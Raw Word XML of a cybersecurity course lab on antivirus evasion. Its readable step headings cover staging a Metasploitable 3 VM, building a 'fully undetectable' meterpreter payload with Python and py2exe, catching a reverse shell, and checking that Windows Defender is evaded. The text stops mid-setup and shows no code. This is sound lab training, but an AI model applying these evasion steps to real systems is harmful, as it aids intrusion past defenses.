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Cybersecurity 401 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Module 6 - Threat Modeling and Analysis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__________________________________________</w:t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160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ppyoft5g3bwv" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OPS 30 - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antivirus Evasion</w:t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pacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9f1ctx67c27f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spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fnxk0pkqo6b" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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731200" cy="47752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64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| Rodrigo Brasil</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   12/2023 |</w:t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spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m9nkr3bby2rt" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: Staging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300" w:line="264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2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download and import the Metasploitable 3 Windows 2008 OVA into VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="30226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300" w:line="264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2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Review hardware resource allocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3409950" cy="1285875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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="6858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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3124200" cy="590550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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2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300" w:line="264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2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set network adapter to clear the error popup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2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300" w:line="264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2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as vagrant/vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4548188" cy="320337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320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300" w:line="264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2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch the VM and select “Activate Later” to bypass the activation prompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4843463" cy="4087174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4087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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2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300" w:line="264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2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the README file on the desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4967288" cy="2508398"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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2508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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rc52673qrywi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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yblbo03tdgzg" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2: FUD Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete “Creating a FUD meterpreter payload with Python” from </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="2882d1"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Antivirus Evasion with Python</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b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25">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - The article has the following incorrect URL: http://www.virtutotal.com/ , the correct URL is </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.virustotal.com/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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center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In this step we will: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 w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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Install required files on the metasploitable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 w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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Create the payload on kali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line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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Download the payload from kali to metasploitable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line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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Transform the payload in an exe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 w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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Configure metasploit on kali to receive a reverse shell when the payload is executed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line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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Deploy the exe onto a windows 10 vm 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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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Check if successfully evaded Windows defender</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xtb1u7cl0dgc" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install required files on the metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center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On the meterpreter we will install the required installation files to make the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center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The files will be </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">py2exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, openssl is optional.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_16tvkxbuq75p" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python2 Install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1422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300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5524500" cy="2667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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4733925" cy="4057650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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2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4"/>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o9s7f8i17562" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL Install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="241300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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4781550" cy="36957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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4752975" cy="360045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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2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4"/>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r8r5dwt44ap7" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Py2exe Install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5667375" cy="314325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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4318000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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5676900" cy="3686175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5676900" cy="3657600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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
